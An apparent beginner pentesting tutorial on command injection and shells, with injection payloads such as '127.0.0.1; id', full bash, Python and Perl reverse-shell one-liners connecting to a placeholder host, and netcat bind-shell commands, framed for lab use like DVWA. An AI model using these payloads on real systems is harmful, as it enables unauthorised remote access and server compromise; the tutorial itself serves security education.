Pentesting 101 – Command Injection & Shell Tricks (Session 1 – Part 2)
Table of Contents
🧠 Intro: From XSS to Command Injection
In Part 1 from our first uni class, we looked at reflected XSS, a client-side injection vulnerability.
This time, we shift our focus to the server-side world — where insecure input handling can lead to total system compromise.
Command Injection happens when user input is unsafely interpolated into shell commands — and suddenly, the server is doing a lot more than it should.
🧨 What Is Command Injection?
Imagine a web app that runs:
ping -c1 [user_input]
If that input isn’t properly sanitized, you can inject shell characters like ;, &&, or ` to chain new commands.
🧪 Examples:
127.0.0.1; id
127.0.0.1 && whoami
127.0.0.1 | uname -a
127.0.0.1 $(ls)
127.0.0.1 `ls`
💥 Each of these abuses how Linux shells parse input and interpret operators.
🔧 Common Shell Operators (Quick Overview)
| Operator | What it does |
|---|---|
; |
Run the next command regardless of success |
&& |
Run next only if previous succeeds |
| ` | |
`cmd` or $(cmd) |
Run the output of cmd inline |
| ` | ` |
& |
Run command in background |
2>&1 |
Redirect stderr (2) to stdout (1) |
💡 Tip: Use
127.1instead of127.0.0.1— it’s shorter, but resolves to the same localhost address.
🔁 Command Redirection & Piping
A common test payload is:
127.0.0.1; id
But you can chain that with:
127.1; ls -la | grep config
127.1; whoami 2>&1
2>&1 is a classic redirect — it merges error output (stderr) into standard output (stdout), making sure you see everything in one stream.
📖 Learn more:
GeeksForGeeks – Piping in Unix/Linux
🛠️ Command Injection in Practice
You’ll often find these issues in:
system(),popen(),exec()in PHP, Python, Bash scripts- Legacy CGI scripts
- URL query strings like
?host=127.1;id
On labs like DVWA, it’s often enough to inject something like:
127.0.0.1; uname -a
Try different operators and command lengths — some filters block semicolons, others miss backticks or $().
🧠 Shells, Reverse Shells & Execution Flow
Once you’ve confirmed command execution on a target system (like via command injection), the next step is often trying to escalate that access into a fully interactive shell.
This is where reverse shells and bind shells come in — they let you break out of limited command execution and actually interact with the system like a logged-in user.
🌀 What Is a Reverse Shell?
A reverse shell is when the target system connects back to you, the attacker, and gives you a shell.
This is super common in real-world pentesting because outbound traffic is usually allowed, while inbound traffic (like with bind shells) often gets blocked by firewalls.
🛠 Typical Reverse Shell Flow:
-
Attacker (you) prepares a listener on your machine:
nc -nlvp 4444 -
Victim executes a payload like:
bash -i >& /dev/tcp/your-ip/4444 0>&1 -
💥 Boom — a shell session opens in your terminal.
🔥 Useful Reverse Shell Variants
If bash isn’t available, try these instead:
🔁 Python:
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("your-ip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh"])'
🧪 Perl:
perl -e 'use Socket;$i="your-ip";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
💡 Other tools:
socatopensslawkbusybox
Need help generating a payload?
✅ Use: RevShells.com
🔗 What Is a Bind Shell?
A bind shell is the opposite: the victim machine opens a port and listens for a connection.
You (the attacker) then connect to that open port and get shell access.
🧱 Example:
Victim runs:
nc -nlvp 4444 -e /bin/sh
Attacker connects:
nc target-ip 4444
⚠️ Problem: Most firewalls block incoming connections — so this is less reliable in real-world networks.
🔄 Reverse Shell vs Bind Shell – Quick Comparison
| Feature | Reverse Shell | Bind Shell |
|---|---|---|
| Who connects? | Victim connects to attacker | Attacker connects to victim |
| Better for NAT/Firewalls? | ✅ Yes | ❌ Usually blocked |
| Stealthier? | ✅ Yes (outbound) | ❌ No (open listener) |
| Common in the wild? | ✅ Very | ⚠️ Rare |
💡 In modern networks, reverse shells are almost always preferred — outbound connections look like normal traffic and are far more likely to succeed.
🧠 But Wait… How Do You Know If You Have a Shell?
If the reverse shell worked correctly, you should see something like:
connection received on 192.168.x.x
whoami
www-data
Congrats — you’re inside. But often it’s not a fully interactive shell (e.g. arrow keys don’t work, no clear screen).
That’s where shell stabilization comes in… but we’ll cover that in a future post. 😉
📚 More Resources
😈 This is where things really start to feel like hacking.
(Though let’s be honest — calling it “hacking” still feels like we’re in a 90s movie.)
📡 Quick Netcat Command Recap
| Command | Purpose |
|---|---|
nc -nlvp PORT |
Listen on a port (Reverse Shell) |
nc IP PORT |
Connect to victim’s port (for Bind Shell) |
nc IP PORT -e /bin/sh |
Send a shell upon connection |
| `nc -nlvp 4444 | tee /tmp/log` |
⚠️ Netcat is unencrypted — no TLS, no protection. Use in isolated labs.
🧰 Tools & Extras
RevShell Generator
Great tool for crafting reverse shell payloads in different languages:
https://www.revshells.com
Shell Stabilization (Coming Soon)
Got a raw shell? We’ll talk about python -c 'pty.spawn("/bin/bash")', stty, and more in the next write-up.
🔍 Final Tip: Injection Meets Bandit
I’ll be exploring command execution with OverTheWire: Bandit soon — perfect to sharpen scripting skills and understand shell environments more deeply.
Also: Watch out for client-side limitations like input length, encoding, or blocked characters.
Use Burp Suite’s request interception to bypass and test real input.
💬 Up Next
- Shell stabilization & pseudo-terminals
- Practical command injection on DVWA and Bandit
- Local privilege escalation after shell access
If you’re new to command injection or unsure when to use ; vs |, you’re not alone — this is where most red team journeys begin 🚀